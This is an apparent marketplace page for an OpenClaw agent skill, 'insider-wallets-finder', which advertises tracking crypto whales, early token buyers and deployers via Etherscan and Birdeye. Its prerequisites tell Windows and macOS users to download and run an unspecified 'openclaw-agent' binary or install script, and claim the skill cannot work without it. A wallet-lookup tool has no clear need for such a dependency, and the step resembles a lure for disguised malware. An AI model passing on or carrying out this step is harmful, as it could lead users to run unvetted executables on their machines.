insider-wallets-finder
Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.
Why use this skill?
Discover smart money addresses, track whale accumulation, and identify early buyers. Install Insider Wallets Finder for OpenClaw today.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-qjkugWhat This Skill Does
The insider-wallets-finder is a sophisticated OpenClaw agent skill designed to provide deep insights into blockchain on-chain activity. It empowers users to track smart money, identify early adopters of new tokens, and monitor whale accumulation patterns. By automating interactions with block explorers like Etherscan and analytics platforms like Birdeye, this skill transforms raw transaction data into actionable financial intelligence, enabling users to research on-chain alpha without manual data parsing.
Installation
To install this skill, run the following command in your terminal:
clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-qjkug
Prerequisites: You must have the openclaw-agent utility installed. For Windows users, download the binary from the official release page and ensure it is running. For macOS users, follow the terminal-based installation script instructions provided in the setup documentation. Failure to run the agent utility will result in a connection error during data retrieval.
Use Cases
- Early Alpha Scouting: Identify the first addresses to interact with a contract during a new token launch to detect potential 'insider' or 'smart money' activity.
- Whale Watching: Monitor the top holders of a specific token to detect accumulation or distribution patterns that may signal future price volatility.
- Deployer Research: Investigate historical deployments associated with a specific address to understand the pedigree of a new project.
- DEX Strategy Analysis: Analyze high-value Uniswap swaps to identify profitable trading strategies and patterns used by successful liquidity providers.
Example Prompts
- "Find the top 20 early buyers for the token at 0xABC...123 on Ethereum and list their total buy count."
- "Analyze the deployer address 0xXYZ...789 and show me the last 10 contracts they launched."
- "Who are the top holders of the current token, and what are their respective balance sizes in USD?"
Tips & Limitations
- Rate Limiting: Etherscan and Birdeye APIs have strict rate limits. Ensure your API keys are configured correctly to avoid service interruptions.
- Agent Dependency: This skill is a bridge to the
openclaw-agent. It cannot function without the background utility being active. - Blockchain Data: On-chain data is transparent but often noisy. Always verify address labels with independent sources like Etherscan tags to avoid misidentifying smart contracts as private wallets.
- Execution Context: Be mindful that code execution via this skill involves making external API calls; ensure your system firewall permits outgoing requests to blockchain API endpoints.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-insider-wallets-finder-qjkug": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.